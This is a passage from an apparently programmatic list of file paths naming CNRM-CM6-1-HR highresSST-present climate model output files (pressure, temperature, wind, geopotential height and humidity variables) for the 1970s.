'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721101-19721130.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001010000-197001312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197002010000-197002282359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197003010000-197003312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197005010000-197005312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197004010000-197004302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197006010000-197006302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197007010000-197007312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197008010000-197008312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197009010000-197009302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197010010000-197010312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197011010000-197011302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197012010000-197012312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197101010000-197101312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197102010000-197102282359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197103010000-197103312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197104010000-197104302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197105010000-197105312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197106010000-197106302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197107010000-197107312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197108010000-197108312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197109010000-197109302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197110010000-197110312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197111010000-197111302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197112010000-197112312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001010000-197001312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197002010000-197002282359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197003010000-197003312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197004010000-197004302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197005010000-197005312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197006010000-197006302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197007010000-197007312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197009010000-197009302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197008010000-197008312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197010010000-197010312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197011010000-197011302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197012010000-197012312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197101010000-197101312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197103010000-197103312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197102010000-197102282359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197104010000-197104302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197105010000-197105312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197106010000-197106302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197107010000-197107312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197108010000-197108312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197109010000-197109302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197111010000-197111302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197110010000-197110312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197112010000-197112312359.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700101-19701231.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710101-19711231.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001010000-197001312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197002010000-197002282359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197003010000-197003312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197004010000-197004302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197005010000-197005312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197006010000-197006302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197007010000-197007312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197008010000-197008312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197009010000-197009302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197010010000-197010312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197011010000-197011302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197012010000-197012312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197101010000-197101312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197102010000-197102282359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197103010000-197103312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197104010000-197104302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197105010000-197105312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197106010000-197106302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197108010000-197108312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197107010000-197107312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197109010000-197109302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197110010000-197110312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197111010000-197111302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197112010000-197112312359.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001-197012.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197101-197112.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700101-19700131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700301-19700331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700201-19700228.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700401-19700430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700501-19700531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700601-19700630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700701-19700731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700801-19700831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701001-19701031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700901-19700930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701101-19701130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701201-19701231.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710101-19710131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710201-19710228.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710501-19710531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710401-19710430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710301-19710331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710601-19710630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710701-19710731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710901-19710930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710801-19710831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711001-19711031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711101-19711130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711201-19711231.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001010000-197001312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197002010000-197002282359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197003010000-197003312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197004010000-197004302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197005010000-197005312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197006010000-197006302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197007010000-197007312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197008010000-197008312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197009010000-197009302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197010010000-197010312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197011010000-197011302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197012010000-197012312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197101010000-197101312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197102010000-197102282359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197103010000-197103312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197104010000-197104302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197105010000-197105312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197106010000-197106302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197109010000-197109302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197107010000-197107312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197108010000-197108312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197110010000-197110312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197111010000-197111302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197112010000-197112312359.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001-197012.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197101-197112.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700101-19700131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700201-19700228.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700301-19700331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700401-19700430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700501-19700531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700601-19700630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700701-19700731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700901-19700930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701001-19701031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701101-19701130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700801-19700831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701201-19701231.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710201-19710228.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710101-19710131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710301-19710331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710401-19710430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710601-19710630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710501-19710531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710701-19710731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710801-19710831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710901-19710930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711001-19711031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711101-19711130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711201-19711231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700101-19700131.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700201-19700228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700301-19700331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700401-19700430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700601-19700630.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700501-19700531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700701-19700731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700801-19700831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701001-19701031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700901-19700930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701201-19701231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701101-19701130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710101-19710131.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710301-19710331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710201-19710228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710401-19710430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710501-19710531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710701-19710731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710801-19710831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710601-19710630.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711001-19711031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710901-19710930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711101-19711130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711201-19711231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700101-19700131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700201-19700228.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700301-19700331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700401-19700430.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700501-19700531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700601-19700630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700801-19700831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700701-19700731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701001-19701031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700901-19700930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701101-19701130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701201-19701231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710101-19710131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710301-19710331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710201-19710228.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710401-19710430.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710501-19710531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710601-19710630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710701-19710731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710901-19710930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710801-19710831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711001-19711031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711101-19711130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711201-19711231.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001010000-197012312359.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197101010000-197112312359.nc',
'v20170518_1970/hus_Emon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001-197912.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197201010000-197201312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197204010000-197204302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197205010000-197205312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197206010000-197206302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197209010000-197209302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197210010000-197210312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197301010000-197301312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197302010000-197302282359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197303010000-197303312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197304010000-197304302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197305010000-197305312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197306010000-197306302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197307010000-197307312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197308010000-197308312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197309010000-197309302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197310010000-197310312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197311010000-197311302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197312010000-197312312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197401010000-197401312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197402010000-197402282359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197403010000-197403312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197404010000-197404302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197405010000-197405312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197406010000-197406302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197407010000-197407312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197601010000-197601312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197408010000-197408312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197602010000-197602292359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197409010000-197409302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197603010000-197603312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197410010000-197410312359.nc',
